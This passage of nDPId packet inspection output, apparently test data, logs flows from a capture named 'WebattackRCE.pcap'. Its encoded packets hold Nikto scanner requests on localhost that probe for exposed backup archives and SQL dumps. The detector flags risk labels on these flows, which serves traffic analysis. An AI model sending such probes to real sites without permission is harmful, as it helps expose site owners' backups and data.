{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276998,"pkt":"AAAAAAAAAAAAAAAACABFAADDYPVAAEAG2z1\/AAABfwAAAcMsH5ARV1iTIbZBJoAYAED+twAAAQEICp1m\/C2dZvwtR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276999,"pkt":"AAAAAAAAAAAAAAAACABFAADByvVAAEAGcT9\/AAABfwAAAcMuH5AHevKTkcnpoIAYAED+tQAAAQEICp1m\/C+dZvwvR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276999,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277000,"pkt":"AAAAAAAAAAAAAAAACABFAADBBihAAEAGNg1\/AAABfwAAAcMwH5BEgD5FJ0MuU4AYAED+tQAAAQEICp1m\/DCdZvwwR0VUIC8xMjcwMC50YXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
